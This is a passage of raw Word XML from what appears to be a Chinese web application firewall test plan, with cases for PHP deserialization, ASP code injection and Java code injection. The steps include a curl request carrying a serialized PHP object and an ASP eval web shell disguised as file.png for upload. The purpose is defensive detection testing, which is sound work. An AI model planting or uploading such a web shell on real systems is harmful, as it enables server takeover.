            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7B3DF27C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="128C742A">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>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31511F23">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10245E2E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，比如用c</w:t>
            </w:r>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如下访问：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3DC3BB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl 'http://www.site.com/' -d 'id=O:4:"test":2:{s:3:"aaa";s:3:"abc";s:3:"bbb";s:3:"def";}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028ABF8B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59D216D1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F96A18B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="30C03C32">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37C49402">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BC222CB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BDC1E8">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575878A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B6EE972">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38FE704A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1426915D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26A36564">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68DDADA5">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5B7E17">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc21077800"/>
      <w:bookmarkStart w:id="58" w:name="_Toc81916103"/>
      <w:bookmarkStart w:id="59" w:name="_Toc1394652629"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:t>代码注入攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="5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4EA6FA58">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="20010875">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="62AE2AA5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>ASP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码注入攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13C48B89">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="76DEEC37">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6118E98C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ASP注入是泛指其他种种允许攻击者直接对服务器脚本引擎提供代码的注入攻击。在ASP注入实例里，服务端脚本引擎是ASP，实际上ASP注入是“动态赋值安全隐患”、“包含文件注入”等的安全隐患，与PHP代码注入相似。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2AADE262">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7629BAEB">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="39F4B365">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>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7B93046D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="521DC887">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>新建文本文件，内容填写为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA2B157">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;%@codepage=65000%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7A4FB1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;%response.codepage=65001:eval(request("xxx"))%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E500128">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并修改文件名为</w:t>
            </w:r>
            <w:r>
              <w:t>file.png</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，通过站点上传该文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E493CCB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="122563DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BD28AA3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="071D8289">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83" name="Picture 385164383"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="asp_event_82ca8c9cd3144a1b82487bd78235c15a_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>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84" name="Picture 385164384"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="asp_event_82ca8c9cd3144a1b82487bd78235c15a_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E460ECB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F74E190">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01FE27B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6C19646">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="30B23287">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F49390A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="771DFFDC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54ED82D9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BAED44C">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D132B6C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc81916104"/>
      <w:bookmarkStart w:id="61" w:name="_Toc21077801"/>
      <w:bookmarkStart w:id="62" w:name="_Toc142728598"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:t>代码注入攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="6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ED43F3C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23759079">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="70343B4F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>JAVA代码注入攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12CC2F12">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4F8AAC19">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="15F929FB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Java代码注入是泛指其他种种允许攻击者直接对服务器脚本引擎提供代码的注入攻击。在JAVA代码注入实例里，服务端脚本引擎是Java，不安全的代码编写会导致攻击者获取到敏感信息或权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C911D80">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3E367173">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="49AB0D30">
            <w:pPr>
              <w:pStyle w:val="148"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>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4225BE0F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF91433">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，</w:t>
            </w:r>
            <w:bookmarkStart w:id="63" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="64" w:name="OLE_LINK20"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>比如用浏览器访问如下链接</w:t>
            </w:r>
            <w:bookmarkEnd w:id="63"/>
            <w:bookmarkEnd w:id="64"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>http://www.site.com/index.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A88BEB2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:bookmarkStart w:id="65" w:name="OLE_LINK22"/>
            <w:bookmarkStart w:id="66" w:name="OLE_LINK21"/>
            <w:r>
              <w:rPr>
